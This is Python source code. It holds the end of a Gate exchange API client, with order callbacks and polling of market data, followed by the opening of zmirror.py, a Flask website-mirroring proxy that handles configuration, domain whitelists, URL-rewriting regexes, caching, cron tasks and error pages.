def onCancelOrder(self,data, req, reqID):
print(u'onCancelOrder(self, data, req, reqID)')
print(data)
#----------------------------------------------------------------------
def onOrderInfo(self,data, req, reqID):
print(u'onOrderInfo(self, data, req, reqID)')
print(data)
#----------------------------------------------------------------------
def onOrderList(self,data, req, reqID):
print(u'onOrderList(self, data, req, reqID)')
print(data)
#----------------------------------------------------------------------
def onTradeList(self,data, req, reqID):
print(u'onTradeList(self, data, req, reqID)')
print(data)
'''
通过 DataApi完成
'''
class Gate_DataApi(object):
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.active = False
self.taskInterval = 3 # 每轮请求延时
self.taskList = [] # 订阅的任务列表
self.taskThread = Thread(target=self.run) # 处理任务的线程
#----------------------------------------------------------------------
def init(self, interval, debug):
"""初始化"""
self.taskInterval = interval
self.DEBUG = debug
self.active = True
self.taskThread.start()
#----------------------------------------------------------------------
def exit(self):
"""退出"""
self.active = False
if self.taskThread.isAlive():
self.taskThread.join()
#----------------------------------------------------------------------
def run(self):
"""连续运行"""
while self.active:
for url, resource ,callback ,params in self.taskList:
try:
data = self.http_get_request(url, resource , params )
if isinstance(data , dict):
data["currencyPair"] = params
callback( data )
except Exception as ex:
print(u'run exception:{},{}'.format(str(ex),traceback.format_exc()),file=sys.stderr)
sleep(self.taskInterval)
# ----------------------------------------------------------------------
def http_get_request(self, url, resource ,params ):
conn = httplib.HTTPSConnection(url, timeout=10)
conn.request("GET", resource + '/' + params)
try:
response = conn.getresponse()
data = response.read().decode('utf-8')
return json.loads(data)
except Exception as e:
print("httpGet failed, detail is:%s" %e)
return {"status":"fail","msg":e}
#----------------------------------------------------------------------
def subscribeTick(self, symbol):
"""订阅实时成交数据"""
url = "/api2/1/ticker"
task = (API_QUERY_URL , url , self.onTick , symbol)
self.taskList.append(task)
#----------------------------------------------------------------------
def subscribeTrades(self, symbol):
"""订阅实时成交数据"""
url = "/api2/1/tradeHistory"
task = (API_QUERY_URL , url, self.onTrades , symbol)
self.taskList.append(task)
#----------------------------------------------------------------------
def subscribeOrderbooks(self, symbol):
"""订阅实时成交数据"""
url = "/api2/1/orderBook"
task = (API_QUERY_URL , url, self.onDepth , symbol)
self.taskList.append(task)
#----------------------------------------------------------------------
def onTick(self, data):
"""实时成交推送"""
print(data)
#----------------------------------------------------------------------
def onTrades(self, data):
"""实时成交推送"""
print(data)
#----------------------------------------------------------------------
def onDepth(self, data):
"""实时成交推送"""
print(data)
|
zmirror.py
|
#!/usr/bin/env python3
# coding=utf-8
import os
import sys
import re
import copy
import zlib
import sched
import queue
import base64
import random
import traceback
import ipaddress
import threading
from fnmatch import fnmatch
from time import time, sleep, process_time
from html import escape as html_escape
from datetime import datetime, timedelta
from urllib.parse import urljoin, urlsplit, urlunsplit, quote_plus
import urllib.parse
import requests
from flask import Flask, request, make_response, Response, redirect
from . import CONSTS
try:
# for python 3.5+ Type Hint
from typing import Union, List, Any, Tuple
except:
pass
try: # 用于检测html的文本编码, cchardet是chardet的c语言实现, 非常快
from cchardet import detect as c_chardet
except:
cchardet_available = False
else:
cchardet_available = True
if os.path.abspath(os.getcwd()) != CONSTS.ZMIRROR_ROOT:
os.chdir(CONSTS.ZMIRROR_ROOT)
from .external_pkgs.ColorfulPyPrint import * # TODO: Migrate logging tools to the stdlib logging
if "ZMIRROR_UNITTEST" in os.environ:
# 这边根据环境变量得到的unittest_mode信息会被config中的覆盖掉
# 只是因为此时还没有加载 config, 所以先根据env里的临时定一下
unittest_mode = True
else:
unittest_mode = False
try: # lru_cache的c语言实现, 比Python内置lru_cache更快
from fastcache import lru_cache # lru_cache用于缓存函数的执行结果
except:
from functools import lru_cache
warnprint('package fastcache not found, '
'fallback to stdlib lru_cache, '
'no FUNCTION is effected, only maybe a bit slower. '
'Considering install it using "pip3 install fastcache"'
)
else:
if not unittest_mode:
infoprint('lru_cache loaded successfully from fastcache')
from .threadlocal import ZmirrorThreadLocal
if not unittest_mode: # 在unittest时不输出这几行
infoprint('zmirror version: {version} author: {author}'.format(version=CONSTS.__VERSION__, author=CONSTS.__AUTHOR__))
infoprint('Github: {site_url}'.format(site_url=CONSTS.__GITHUB_URL__))
try: # 加载默认设置
from config_default import *
except: # coverage: exclude
errprint('the config_default.py is missing, this program may not works normally\n'
'config_default.py 文件丢失, 这会导致配置文件不向后兼容, 请重新下载一份 config_default.py')
raise # v0.23.1+ 当 config_default.py 不存在时, 程序会终止运行
try: # 加载用户自定义配置文件, 覆盖掉默认配置的同名项
from config import *
except: # coverage: exclude
errprint(
'the config_default.py is missing, fallback to default configs(if we can), '
'please COPY the config_default.py to config.py, and change it\'s content, '
'or use the configs in the more_configs folder\n'
'自定义配置文件 config.py 丢失或存在错误, 将使用默认设置, 请将 config_default.py 复制一份为 config.py, '
'并根据自己的需求修改里面的设置'
'(或者使用 more_configs 中的配置文件)'
)
raise # v0.23.1+ 当config文件存在错误或不存在时, 程序会终止运行
else:
target_domain = target_domain.strip("./ \t").replace("https://", "").replace("http://", "")
infoprint('config file found, mirroring: ', target_domain)
if unittest_mode:
import importlib
importlib.reload(importlib.import_module("zmirror.utils"))
importlib.reload(importlib.import_module("zmirror.connection_pool"))
from .utils import *
from .lru_dict import LRUDict
from . import connection_pool
if local_cache_enable:
try:
from .cache_system import FileCache, get_expire_from_mime
cache = FileCache()
except: # coverage: exclude
traceback.print_exc()
errprint('Can Not Create Local File Cache, local file cache is disabled automatically.')
local_cache_enable = False
else:
if not unittest_mode:
infoprint('Local file cache enabled')
# ########## Basic Init #############
# 开始从配置文件加载配置, 在读代码时可以先跳过这部分, 从 main_function() 开始看
ColorfulPyPrint_set_verbose_level(verbose_level)
if developer_enable_experimental_feature: # coverage: exclude
# 先处理实验性功能开关
pass
my_host_name_no_port = my_host_name # 不带有端口号的本机域名
if my_host_port is not None:
my_host_name += ':' + str(my_host_port) # 带有端口号的本机域名, 如果为标准端口则不带显式端口号
my_host_name_urlencoded = quote_plus(my_host_name) # url编码后的
else:
my_host_name_urlencoded = my_host_name
if external_domains is None:
external_domains = []
external_domains = list([d.strip("./ \t").replace("https://", "").replace("http://", "") for d in external_domains])
external_domains_set = set(external_domains or [])
allowed_domains_set = external_domains_set.copy()
allowed_domains_set.add(target_domain)
for _domain in external_domains: # for support domain with port
allowed_domains_set.add(urlsplit('http://' + _domain).hostname)
domain_alias_to_target_set = set() # 那些被视为主域名的域名, 如 www.google.com和google.com可以都被视为主域名
domain_alias_to_target_set.add(target_domain)
domains_alias_to_target_domain = list(domains_alias_to_target_domain)
if domains_alias_to_target_domain:
for _domain in domains_alias_to_target_domain:
allowed_domains_set.add(_domain)
domain_alias_to_target_set.add(_domain)
domains_alias_to_target_domain.append(target_domain)
else:
domains_alias_to_target_domain = [target_domain]
my_host_scheme_escaped = my_host_scheme.replace('/', r'\/')
myurl_prefix = my_host_scheme + my_host_name # http(s)://www.my-mirror-site.com 末尾没有反斜线
myurl_prefix_escaped = myurl_prefix.replace('/', r'\/')
cdn_domains_number = len(CDN_domains)
allowed_remote_response_headers = {
'content-type', 'date', 'expires', 'cache-control', 'last-modified', 'server', 'location',
'accept-ranges',
'access-control-allow-origin', 'access-control-allow-headers', 'access-control-allow-methods',
'access-control-expose-headers', 'access-control-max-age', 'access-control-allow-credentials',
'timing-allow-origin',
}
allowed_remote_response_headers.update(custom_allowed_remote_headers)
# ## Get Target Domain and MyHostName's Root Domain ##
target_domain_root = extract_root_domain(target_domain)[0] # type: str
my_host_name_root = extract_root_domain(target_domain)[0] # type: str
# ########## Handle dependencies #############
if not enable_stream_content_transfer:
steamed_mime_keywords = ()
if not url_custom_redirect_enable:
url_custom_redirect_list = {}
url_custom_redirect_regex = ()
shadow_url_redirect_regex = ()
plain_replace_domain_alias = []
if isinstance(plain_replace_domain_alias, tuple):
plain_replace_domain_alias = list(plain_replace_domain_alias)
if not enable_stream_content_transfer:
enable_stream_transfer_async_preload = False
if not enable_automatic_domains_whitelist:
domains_whitelist_auto_add_glob_list = tuple()
if not enable_individual_sites_isolation:
isolated_domains = set()
else:
for isolated_domain in isolated_domains:
if isolated_domain not in external_domains_set:
warnprint('An isolated domain:', isolated_domain,
'would not have effect because it did not appears in the `external_domains` list')
if enable_custom_access_cookie_generate_and_verify:
human_ip_verification_whitelist_from_cookies = False
if not is_use_proxy:
requests_proxies = None
if human_ip_verification_enabled:
buff = []
for network in human_ip_verification_default_whitelist_networks:
buff.append(ipaddress.ip_network(network, strict=False))
human_ip_verification_default_whitelist_networks = tuple(buff)
for question in human_ip_verification_questions:
human_ip_verification_answers_hash_str += question[1]
else:
identity_verify_required = False
human_ip_verification_whitelist_from_cookies = False
must_verify_cookies = False
if not human_ip_verification_whitelist_from_cookies and not enable_custom_access_cookie_generate_and_verify:
must_verify_cookies = False
# ########### Global Variables ###############
# 与flask的request变量功能类似, 存储了一些解析后的请求信息, 在程序中会经常被调用
parse = ZmirrorThreadLocal()
# task_scheduler
task_scheduler = sched.scheduler(time, sleep)
# 记录一个URL的一些信息, 以及是否应该使用CDN
url_to_use_cdn = LRUDict(40960)
# 结构例子见下
url_to_use_cdn["www.fake-domain.com/folder/foo/bar.png"] = [
True, # Should this url use CDN
"image/png", # MIME
17031, # size, if size too small, will not redirect to cdn
]
# 记录最近请求的100个域名, 用于 domain_guess
# 虽然是个 dict, 但是只有key有用, value是无用的, 暂时全部赋值为 True
recent_domains = LRUDict(100)
recent_domains[target_domain] = True
# domain_guess 中已知的记录
# 对于已知的记录, 会使用307重定向
domain_guess_cache = LRUDict(1000)
# 格式如下:
domain_guess_cache[("example.com", "/path/no/query/string")] = "target.domain.com"
# ########### PreCompile Regex ###############
# 冒号(colon :)可能的值为:
# : %3A %253A 完整列表见 tests.TestRegex.REGEX_POSSIBLE_COLON
REGEX_COLON = r"""(?::|%(?:25)?3[Aa])"""
# 斜线(slash /)可能的值为(包括大小写):
# 完整列表见 tests.TestRegex.REGEX_POSSIBLE_COLON
# / \/ \\/ \\\(N个反斜线)/ %2F %5C%2F %5C%5C(N个5C)%2F %255C%252F %255C%255C%252F \x2F
REGEX_SLASH = r"""(?:\\*(?:/|x2[Ff])|%(?:(?:25)?5[Cc]%)*(?:25)?2[Ff])"""
# 引号 可能值的完整列表见 tests.TestRegex.REGEX_POSSIBLE_QUOTE
# " ' \\(可能有N个反斜线)' \\(可能有N个反斜线)"
# %22 %27 %5C(可能N个5C)%22 %5C(可能N个5C)%27
# %2522 %2527 %255C%2522 %255C%2527
# "
REGEX_QUOTE = r"""(?:\\*["']|%(?:(?:25)?5[Cc]%)*2(?:52)?[27]|")"""
# 代表本镜像域名的正则
if my_host_port is not None:
REGEX_MY_HOST_NAME = r'(?:' + re.escape(my_host_name_no_port) + REGEX_COLON + re.escape(str(my_host_port)) \
+ r'|' + re.escape(my_host_name_no_port) + r')'
else:
REGEX_MY_HOST_NAME = re.escape(my_host_name)
# Advanced url rewriter, see function response_text_rewrite()
# #### 这个正则表达式是整个程序的最核心的部分, 它的作用是从 html/css/js 中提取出长得类似于url的东西 ####
# 如果需要阅读这个表达式, 请一定要在IDE(如PyCharm)的正则高亮下阅读
# 这个正则并不保证匹配到的东西一定是url, 在 regex_url_reassemble() 中会进行进一步验证是否是url
regex_adv_url_rewriter = re.compile(
# 前缀, 必须有 'action='(表单) 'href='(链接) 'src=' 'url('(css) '@import'(css) '":'(js/json, "key":"value")
# \s 表示空白字符,如空格tab
r"""(?P<prefix>\b(?:(?:src|href|action)\s*=|url\s*\(|@import\s*|"\s*:)\s*)""" + # prefix, eg: src=
# 左边引号, 可选 (因为url()允许没有引号). 如果是url以外的, 必须有引号且左右相等(在重写函数中判断, 写在正则里可读性太差)
r"""(?P<quote_left>["'])?""" + # quote "'
# 域名和协议头, 可选. http:// https:// // http:\/\/ (json) https:\/\/ (json) \/\/ (json)
r"""(?P<domain_and_scheme>(?P<scheme>(?:https?:)?\\?/\\?/)(?P<domain>(?:[-a-z0-9]+\.)+[a-z]+(?P<port>:\d{1,5})?))?""" +
# url路径, 含参数 可选
r"""(?P<path>[^\s;+$?#'"\{}]*?""" + # full path(with query string) /foo/bar.js?love=luciaZ
# 查询字符串, 可选
r"""(?P<query_string>\?[^\s?#'"]*?)?)""" + # query string ?love=luciaZ
# 右引号(可以是右括弧), 必须
r"""(?P<quote_right>["')])(?P<right_suffix>\W)""", # right quote "'
flags=re.IGNORECASE
)
# Response Cookies Rewriter, see response_cookie_rewrite()
regex_cookie_rewriter = re.compile(r'\bdomain=(\.?([\w-]+\.)+\w+)\b', flags=re.IGNORECASE)
regex_cookie_path_rewriter = re.compile(r'(?P<prefix>[pP]ath)=(?P<path>[\w\._/-]+?;)')
# Request Domains Rewriter, see client_requests_text_rewrite()
# 该正则用于匹配类似于下面的东西
# [[[http(s):]//]www.mydomain.com/]extdomains/(https-)target.com
# 兼容各种urlencode/escape
#
# 注意, 若想阅读下面的正则表达式, 请一定要在 Pycharm 的正则高亮下进行
# 否则不对可能的头晕/恶心负责
# 下面那个正则, 在组装以后的样子大概是这样的(已大幅简化):
# 假设b.test.com是本机域名
# ((https?:/{2})?b\.test\.com/)?extdomains/(https-)?((?:[\w-]+\.)+\w+)\b
#
# 对应的 unittest 见 TestRegex.test__regex_request_rewriter_extdomains()
regex_request_rewriter_extdomains = re.compile(
r"""(?P<domain_prefix>""" +
( # [[[http(s):]//]www.mydomain.com/]
r"""(?P<scheme>""" +
( # [[http(s):]//]
( # [http(s):]
r"""(?:https?(?P<colon>{REGEX_COLON}))?""".format(REGEX_COLON=REGEX_COLON) # https?:
) +
r"""(?P<scheme_slash>%s)(?P=scheme_slash)""" % REGEX_SLASH # //
) +
r""")?""" +
REGEX_MY_HOST_NAME + # www.mydomain.com[:port] 本部分的正则在上面单独组装
r"""(?P<slash2>(?(scheme_slash)(?P=scheme_slash)|{REGEX_SLASH}))""".format(REGEX_SLASH=REGEX_SLASH) # # /
) +
r""")?""" +
r"""extdomains(?(slash2)(?P=slash2)|{REGEX_SLASH})(?P<is_https>https-)?""".format(
REGEX_SLASH=REGEX_SLASH) + # extdomains/(https-)
r"""(?P<real_domain>(?:[\w-]+\.)+\w+)\b""", # target.com
flags=re.IGNORECASE,
)
regex_request_rewriter_main_domain = re.compile(REGEX_MY_HOST_NAME)
# 以下正则为*实验性*的 response_text_basic_rewrite() 的替代品
# 用于函数 response_text_basic_mirrorlization()
# 理论上, 在大量域名的情况下, 会比现有的暴力字符串替换要快, 并且未来可以更强大的域名通配符
# v0.28.0加入, v0.28.3后默认启用
def _regex_generate__basic_mirrorlization():
"""产生 regex_basic_mirrorlization
用一个函数包裹起来是因为在 try_match_and_add_domain_to_rewrite_white_list()
中需要动态修改 external_domains, 修改以后可能需要随之生成新的正则, 包裹一下比较容易调用
"""
from collections import Counter
# 统计各个后缀出现的频率, 并且按照出现频率降序排列, 有助于提升正则效率
c = Counter(re.escape(x.split(".")[-1]) for x in allowed_domains_set)
regex_all_remote_tld = sorted(list(c.keys()), key=lambda x: c[x], reverse=True)
regex_all_remote_tld = "(?:" + "|".join(regex_all_remote_tld) + ")"
return re.compile(
r"""(?:""" +
( # [[http(s):]//] or [\?["']] or %27 %22 or "
r"""(?P<scheme>""" +
( # [[http(s):]//]
( # [http(s):]
r"""(?:https?(?P<colon>{REGEX_COLON}))?""".format(REGEX_COLON=REGEX_COLON) # https?:
) +
r"""(?P<scheme_slash>%s)(?P=scheme_slash)""" % REGEX_SLASH # //
) +
r""")""" +
r"""|""" +
# [\?["']] or %27 %22 or "
r"""(?P<quote>{REGEX_QUOTE})""".format(REGEX_QUOTE=REGEX_QUOTE)
) +
r""")""" +
# End prefix.
# Begin domain
r"""(?P<domain>([a-zA-Z0-9-]+\.){1,5}%s)\b""" % regex_all_remote_tld +
# Optional suffix slash
r"""(?P<suffix_slash>(?(scheme_slash)(?P=scheme_slash)|{SLASH}))?""".format(SLASH=REGEX_SLASH) +
# right quote (if we have left quote)
r"""(?(quote)(?P=quote))"""
)
regex_basic_mirrorlization = _regex_generate__basic_mirrorlization()
# 用于移除掉cookie中类似于 zmirror_verify=75bf23086a541e1f; 的部分
regex_remove__zmirror_verify__header = re.compile(
r"""zmirror_verify=[a-zA-Z0-9]+\b;? ?"""
)
# 遍历编译 custom_inject_content 中的regex
custom_inject_content = custom_inject_content or {}
for k, v in custom_inject_content.items():
if not v:
continue
for a in v:
if a.get("url_regex") is None:
continue
a["url_regex"] = re.compile(a["url_regex"], flags=re.I)
# ########## Flask app ###########
app = Flask( # type: Flask
__name__ if not unittest_mode
else 'unittest' + str(random.random()).replace('.', ''),
static_folder=None,
template_folder=None,
)
# ########## Begin Utils #############
def response_text_basic_mirrorlization(text):
"""
response_text_basic_rewrite() 的实验性升级版本, 默认启用
*v0.28.1.dev*
之前版本是在正则中匹配所有允许的域名, 现在改为匹配所有可能允许的TLD,
可以带来一些性能的提升, 并且容易进行动态域名添加和通配符支持
*v0.28.2*
进一步优化正则, 性能提升 47% 左右 (速度约为传统暴力替换的4.4倍)
*v0.28.3*
目前来看该功能工作得相当好, 由实验性特性改为正式使用
移除旧版 response_text_basic_rewrite(), 只保留一个为了向下兼容的 alias
:param text: 远程响应文本
:type text: str
:return: 重写后的响应文本
:rtype: str
"""
def regex_reassemble(m):
remote_domain = get_group("domain", m)
if remote_domain not in allowed_domains_set:
if not enable_automatic_domains_whitelist or \
not try_match_and_add_domain_to_rewrite_white_list(remote_domain):
return m.group()
suffix_slash = get_group("suffix_slash", m)
slash = get_group("scheme_slash", m) or suffix_slash or "/"
colon = get_group("colon", m) or guess_colon_from_slash(slash)
_my_host_name = my_host_name.replace(":", colon) if my_host_port else my_host_name
if remote_domain not in domain_alias_to_target_set:
# 外部域名
core = _my_host_name + slash + "extdomains" + slash + remote_domain + suffix_slash
else:
# 主域名
core = _my_host_name + suffix_slash
quote = get_group("quote", m)
if quote: # "target.domain"
return quote + core + quote
else: # http(s)://target.domain //target.domain
if get_group("colon", m): # http(s)://target.domain
return my_host_scheme.replace(":", colon).replace("/", slash) + core
else: # //target.domain
return slash * 2 + core
return regex_basic_mirrorlization.sub(regex_reassemble, text)
def encoding_detect(byte_content):
"""
试图解析并返回二进制串的编码, 如果失败, 则返回 None
:param byte_content: 待解码的二进制串
:type byte_content: bytes
:return: 编码类型或None
:rtype: Union[str, None]
"""
if force_decode_remote_using_encode is not None:
return force_decode_remote_using_encode
if possible_charsets:
for charset in possible_charsets:
try:
byte_content.decode(encoding=charset)
except:
pass
else:
return charset
if cchardet_available: # detect the encoding using cchardet (if we have)
return c_chardet(byte_content)['encoding']
return None
def cache_clean(is_force_flush=False):
"""
清理程序运行中产生的垃圾, 在程序运行期间会被自动定期调用
包括各种重写缓存, 文件缓存等
默认仅清理过期的
:param is_force_flush: 是否无视有效期, 清理所有缓存
:type is_force_flush: bool
"""
if enable_connection_keep_alive:
connection_pool.clear(force_flush=is_force_flush)
if local_cache_enable:
cache.check_all_expire(force_flush_all=is_force_flush)
if is_force_flush:
try:
url_to_use_cdn.clear()
is_domain_match_glob_whitelist.cache_clear()
is_mime_streamed.cache_clear()
extract_real_url_from_embedded_url.cache_clear()
embed_real_url_to_embedded_url.cache_clear()
check_global_ua_pass.cache_clear()
is_mime_represents_text.cache_clear()
extract_mime_from_content_type.cache_clear()
is_content_type_using_cdn.cache_clear()
is_ua_in_whitelist.cache_clear()
verify_ip_hash_cookie.cache_clear()
is_denied_because_of_spider.cache_clear()
is_ip_not_in_allow_range.cache_clear()
# client_requests_text_rewrite.cache_clear()
# extract_url_path_and_query.cache_clear()
except: # coverage: exclude
errprint('ErrorWhenCleaningFunctionLruCache')
traceback.print_exc()
def cron_task_container(task_dict, add_task_only=False):
"""
定时任务容器. 调用目标函数, 并在运行结束后创建下一次定时
:param task_dict: 定时任务的相关参数, dict
{ "target":目标函数(可调用的函数对象,不是函数名字符串) 必须,
"iterval":任务延时(秒) 可选,
"priority":优先级 可选,
"name":定时任务别名 可选
"args":位置型参数 (arg1,arg2) 可选,
"kwargs":键值型参数 {key:value,} 可选,
}
:param add_task_only: 是否只添加定时任务而不执行
"""
global task_scheduler
if not add_task_only:
# 执行任务
try:
infoprint('CronTask:', task_dict.get('name', str(task_dict['target'])), 'Target:', str(task_dict['target']))
target_func = task_dict.get('target')
if target_func is None:
raise ValueError("target is not given in " + str(task_dict))
target_func(
*(task_dict.get('args', ())), # 解开参数以后传递
**(task_dict.get('kwargs', {}))
)
except: # coverage: exclude
errprint('ErrorWhenProcessingCronTasks', task_dict)
traceback.print_exc()
# 当全局开关关闭时, 自动退出线程
if not enable_cron_tasks:
if threading.current_thread() != threading.main_thread():
exit()
else:
return
# 添加下一次定时任务
task_scheduler.enter(
task_dict.get('interval', 300),
task_dict.get('priority', 999),
cron_task_container,
(task_dict,)
)
def cron_task_host():
"""定时任务宿主, 每分钟检查一次列表, 运行时间到了的定时任务"""
while True:
# 当全局开关关闭时, 自动退出线程
if not enable_cron_tasks:
if threading.current_thread() != threading.main_thread():
exit()
else:
return
sleep(60)
try:
task_scheduler.run()
except: # coverage: exclude
errprint('ErrorDuringExecutingCronTasks')
traceback.print_exc()
def add_temporary_domain_alias(source_domain, replaced_to_domain):
"""
添加临时域名替换列表
用于纯文本域名替换, 见 `plain_replace_domain_alias` 选项
:param source_domain: 被替换的域名
:param replaced_to_domain: 替换成这个域名
:type source_domain: str
:type replaced_to_domain: str
"""
if parse.temporary_domain_alias is None:
parse.temporary_domain_alias = []
else:
parse.temporary_domain_alias = list(parse.temporary_domain_alias)
parse.temporary_domain_alias.append((source_domain, replaced_to_domain))
dbgprint('A domain', source_domain, 'to', replaced_to_domain, 'added to temporary_domain_alias',
parse.temporary_domain_alias)
def is_external_domain(domain):
"""是否是外部域名"""
return domain not in domains_alias_to_target_domain
# noinspection PyGlobalUndefined
def try_match_and_add_domain_to_rewrite_white_list(domain, force_add=False):
"""
若域名与`domains_whitelist_auto_add_glob_list`中的通配符匹配, 则加入 external_domains 列表
被加入 external_domains 列表的域名, 会被应用重写机制
用于在程序运行过程中动态添加域名到external_domains中
也可在外部函数(custom_func.py)中使用
关于 external_domains 更详细的说明, 请看 default_config.py 中对应的文档
:type domain: str
:type force_add: bool
:rtype: bool
"""
global external_domains, external_domains_set, allowed_domains_set, prefix_buff
global regex_basic_mirrorlization
if domain is None or not domain:
return False
if domain in allowed_domains_set:
return True
if not force_add and not is_domain_match_glob_whitelist(domain):
return False
infoprint('A domain:', domain, 'was added to external_domains list')
_buff = list(external_domains) # external_domains是tuple类型, 添加前需要先转换
_buff.append(domain)
external_domains = tuple(_buff) # 转换回tuple, tuple有一些性能优势
external_domains_set.add(domain)
allowed_domains_set.add(domain)
prefix_buff[domain] = calc_domain_replace_prefix(domain)
# 重新生成匹配正则
regex_basic_mirrorlization = _regex_generate__basic_mirrorlization()
# write log
try:
with open(zmirror_root('automatic_domains_whitelist.log'), 'a', encoding='utf-8') as fp:
fp.write(domain + '\n')
except: # coverage: exclude
traceback.print_exc()
return True
def decode_mirror_url(mirror_url=None):
"""
解析镜像url(可能含有extdomains), 并提取出原始url信息
可以不是完整的url, 只需要有 path 部分即可(query_string也可以有)
若参数留空, 则使用当前用户正在请求的url
支持json (处理 \/ 和 \. 的转义)
:rtype: dict[str, Union[str, bool]]
:return: {'domain':str, 'is_https':bool, 'path':str, 'path_query':str}
"""
_is_escaped_dot = False
_is_escaped_slash = False
result = {}
if mirror_url is None:
input_path_query = extract_url_path_and_query() # type: str
else:
if r'\/' in mirror_url: # 如果 \/ 在url中, 先反转义, 处理完后再转义回来
_is_escaped_slash = True
mirror_url = mirror_url.replace(r'\/', '/')
if r'\.' in mirror_url: # 如果 \. 在url中, 先反转义, 处理完后再转义回来
_is_escaped_dot = True
mirror_url = mirror_url.replace(r'\.', '.')
input_path_query = extract_url_path_and_query(mirror_url) # type: str
if input_path_query[:12] == '/extdomains/':
# 12 == len('/extdomains/')
split = urlsplit("//" + input_path_query[12:].lstrip("/")) # type: urllib.parse.SplitResult
real_domain = split.netloc
real_path_query = (split.path or "/") + (("?" + split.query) if split.query else "")
if real_domain[:6] == 'https-':
# 如果显式指定了 /extdomains/https-域名 形式(为了兼容老版本)的, 那么使用https
real_domain = real_domain[6:]
_is_https = True
else:
# 如果是 /extdomains/域名 形式, 没有 "https-" 那么根据域名判断是否使用HTTPS
_is_https = is_target_domain_use_https(real_domain)
real_path_query = client_requests_text_rewrite(real_path_query)
if _is_escaped_dot: real_path_query = real_path_query.replace('.', r'\.')
if _is_escaped_slash: real_path_query = s_esc(real_path_query)
result['domain'] = real_domain
result['is_https'] = _is_https
result['path_query'] = real_path_query
result['path'] = urlsplit(result['path_query']).path
return result
input_path_query = client_requests_text_rewrite(input_path_query)
if _is_escaped_dot: input_path_query = input_path_query.replace('.', r'\.')
if _is_escaped_slash: input_path_query = s_esc(input_path_query)
result['domain'] = target_domain
result['is_https'] = (target_scheme == 'https://')
result['path_query'] = input_path_query
result['path'] = urlsplit(result['path_query']).path
return result
# 函数别名, 为了兼容早期版本的配置文件
extract_from_url_may_have_extdomains = decode_mirror_url
# noinspection PyShadowingNames
def encode_mirror_url(raw_url_or_path, remote_domain=None, is_scheme=None, is_escape=False):
"""convert url from remote to mirror url
:type raw_url_or_path: str
:type remote_domain: str
:type is_scheme: bool
:type is_escape: bool
:rtype: str
"""
if is_escape:
_raw_url_or_path = raw_url_or_path.replace('r\/', r'/')
else:
_raw_url_or_path = raw_url_or_path
sp = urlsplit(_raw_url_or_path)
if '/extdomains/' == sp.path[:12]:
return raw_url_or_path
domain = remote_domain or sp.netloc or parse.remote_domain or target_domain
if domain not in allowed_domains_set:
return raw_url_or_path
if is_scheme is not False:
if _raw_url_or_path[:2] == '//':
our_prefix = '//' + my_host_name
elif is_scheme or sp.scheme:
our_prefix = myurl_prefix
else:
our_prefix = ''
else:
our_prefix = ''
if is_external_domain(domain):
middle_part = '/extdomains/' + domain
else:
middle_part = ''
result = urljoin(our_prefix + middle_part + '/',
extract_url_path_and_query(_raw_url_or_path).lstrip('/'))
if is_escape:
result = s_esc(result)
return result
# 函数别名, 为了兼容早期版本的配置文件
convert_to_mirror_url = encode_mirror_url
def is_target_domain_use_https(domain):
"""请求目标域名时是否使用https"""
if force_https_domains == 'NONE':
return False
if force_https_domains == 'ALL':
return True
if domain in force_https_domains:
return True
else:
return False
def add_ssrf_allowed_domain(domain):
"""添加域名到ssrf白名单, 不支持通配符
:type domain: str
"""
global allowed_domains_set
allowed_domains_set.add(domain)
def dump_zmirror_snapshot(folder="error_dump", msg=None, our_response=None):
"""
dump当前状态到文件
:param folder: 文件夹名
:type folder: str
:param our_response: Flask返回对象, 可选
:type our_response: Response
:param msg: 额外的信息
:type msg: str
:return: dump下来的文件绝对路径
:rtype: Union[str, None]
"""
import pickle
try:
if not os.path.exists(zmirror_root(folder)):
os.mkdir(zmirror_root(folder))
_time_str = datetime.now().strftime('snapshot_%Y-%m-%d_%H-%M-%S')
import config
snapshot = {
"time": datetime.now(),
"parse": parse.dump(),
"msg": msg,
"traceback": traceback.format_exc(),
"config": attributes(config, to_dict=True),
"FlaskRequest": attributes(request, to_dict=True),
}
if our_response is not None:
our_response.freeze()
snapshot["OurResponse"] = our_response
dump_file_path = os.path.abspath(os.path.join(zmirror_root(folder), _time_str + '.dump'))
with open(dump_file_path, 'wb') as fp:
pickle.dump(snapshot, fp, pickle.HIGHEST_PROTOCOL)
return dump_file_path
except:
return None
def generate_error_page(errormsg='Unknown Error', error_code=500, is_traceback=False, content_only=False):
"""
:type content_only: bool
:type errormsg: Union(str, bytes)
:type error_code: int
:type is_traceback: bool
:rtype: Union[Response, str]
"""
if is_traceback:
traceback.print_exc()
errprint(errormsg)
if isinstance(errormsg, bytes):
errormsg = errormsg.decode()
dump_file_path = dump_zmirror_snapshot(msg=errormsg)
request_detail = ""
for attrib in filter(lambda x: x[0] != '_' and x[-2:] != '__', dir(parse)):
request_detail += "<tr><td>{attrib}</td><td>{value}</td></tr>" \
.format(attrib=attrib, value=html_escape(str(parse.__getattribute__(attrib))))
error_page = """<!doctype html><html lang="zh-CN"><head><meta charset="UTF-8">
<title>zmirror internal error</title>
<style>code{{background-color: #cccaca;}}</style>
</head>
<body>
<h1>zmirror internal error</h1>
An fatal error occurs. 服务器中运行的zmirror出现一个内部错误.<br>
<hr>
<h2>If you are visitor 如果你是访客</h2>
This site is temporary unavailable because some internal error<br>
Please contact your site admin. <br>
该镜像站暂时出现了临时的内部故障, 请联系网站管理员<br>
<hr>
<h2>If you are admin</h2>
You can find full detail log in your server's log.<br>
For apache, typically at <code>/var/log/apache2/YOUR_SITE_NAME_error.log</code><br>
tips: you can use <code>tail -n 100 -f YOUR_SITE_NAME_error.log</code> to view real-time log<br>
<br>
If you can't solve it by your self, here are some ways may help:<br>
<ul>
<li>contact the developer by email: <a href="mailto:i@z.codes" target="_blank">aploium <i@z.codes></a></li>
<li>seeking for help in zmirror's <a href="https://gitter.im/zmirror/zmirror" target="_blank">online chat room</a></li>
<li>open an <a href="https://github.com/aploium/zmirror/issues" target="_blank">issue</a> (as an bug report) in github</li>
</ul>
<h3>Snapshot Dump</h3>
An snapshot has been dumped to <code>{dump_file_path}</code> <br>
You can load it using (Python3 code) <code>pickle.load(open(r"{dump_file_path}","rb"))</code><br>
The snapshot contains information which may be helpful for debug
<h3>Detail</h3>
<table border="1"><tr><th>Attrib</th><th>Value</th></tr>
{request_detail}
</table>
<h3>Additional Information</h3>
<pre>{errormsg}</pre>
<h3>Traceback</h3>
<pre>{traceback_str}</pre>
<hr>
<div style="font-size: smaller">Powered by <em>zmirror {version}</em><br>
<a href="{official_site}" target="_blank">{official_site}</a></div>
</body></html>""".format(
errormsg=errormsg, request_detail=request_detail,
